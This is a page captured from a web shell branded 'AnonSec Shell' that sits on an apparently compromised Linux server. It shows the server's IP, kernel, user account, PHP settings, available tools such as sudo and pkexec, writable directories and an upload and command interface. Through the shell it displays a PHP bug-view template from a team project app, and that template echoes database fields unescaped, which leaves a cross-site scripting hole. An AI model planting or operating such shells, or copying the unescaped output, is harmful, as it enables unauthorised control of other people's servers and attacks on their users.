AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.217.114
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/team/application/views/backend/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/team/application/views/backend/admin/project_bug_view.php
<?php

$bug = $this->db->get_where('project_bug', array('project_bug_id' => $param2))->result_array();
foreach ($bug as $row):
    ?>

    <div class="row">
        <div class="col-md-12">
            <blockquote class="blockquote-default">
                <p>
                    <strong><?php echo $row['title']; ?></strong>
                </p>
                <p>
                    <small><?php echo $row['description']; ?></small>
                    <?php if ($row['file'] != ''): ?>
                        <br>

                        <i class="entypo-download" style="color: #ccc;"></i>
                        <a style="font-size: 10px; color: #979797;" href="<?php echo base_url(); ?>uploads/bug_file/<?php echo $row['file']; ?>"><?php echo $row['file']; ?></a>

                    <?php endif; ?>
                <hr />

                <i class="entypo-user" style="color: #ccc;"></i>
                <?php
                $type = $row['user_type'];
                $id = $row['user_id'];
                $name = $this->db->get_where($type, array($type . '_id' => $id))->row()->name;
                echo $name;
                ?>
                &nbsp;
                &nbsp;
                <i class="entypo-calendar" style="color: #ccc;"></i>
    <?php echo date("d M Y", $row['timestamp']); ?>
                &nbsp;
                &nbsp;
                
                </p>

            </blockquote>

        </div>
    </div>

<?php endforeach; ?>

Anon7 - 2022
AnonSec Team